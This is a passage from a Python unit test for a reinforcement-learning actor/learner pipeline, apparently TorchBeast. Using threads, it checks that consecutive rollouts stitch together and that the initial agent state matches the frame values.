            outputs = self.model(dict(frame=frame, done=done), agent_state)
            batch.set_outputs(outputs)

    def learn(self):
        # Consume learner batches and verify rollout stitching and the
        # initial agent state passed with each rollout.
        for i, tensors in enumerate(self.learner_queue):
            batch, initial_agent_state = tensors
            env_outputs, actor_outputs = batch
            frame, _, done, *_ = env_outputs
            # Make sure the last env_outputs of a rollout equals the first of the
            # following one.
            # This is guaranteed to be true if there is only one actor filling up
            # the learner queue.
            self.assertEqual(frame[self.T][0].item(), frame[0][1].item())
            self.assertEqual(done[self.T][0].item(), done[0][1].item())
            # Make sure the initial state equals the value of the frame at the beginning
            # of the rollout. This has to be the case in our test since:
            # - every call to forward increments the core state by one.
            # - every call to step increments the value in the frame by one (modulo 5).
            env_done_after = 5  # Matches self.done_after in core_agent_state_env.py.
            self.assertEqual(
                frame[0][0].item(), initial_agent_state[0][0].item() % env_done_after
            )
            self.assertEqual(
                frame[0][1].item(), initial_agent_state[0][1].item() % env_done_after
            )
            if i >= 10:
                # Stop execution.
                self.learner_queue.close()
                self.inference_batcher.close()

    def test_core_agent_state(self):
        def run():
            self.actor.run()

        threads = [
            threading.Thread(target=self.inference),
            threading.Thread(target=run),
        ]
        # Start actor and inference thread.
        for thread in threads:
            thread.start()
        # learn() runs in the main thread and closes the queues when done
        self.learn()
        for thread in threads:
            thread.join()

    def tearDown(self):
        # stop the environment server subprocess
        self.server_proc.terminate()
        self.server_proc.wait()


if __name__ == "__main__":
    unittest.main()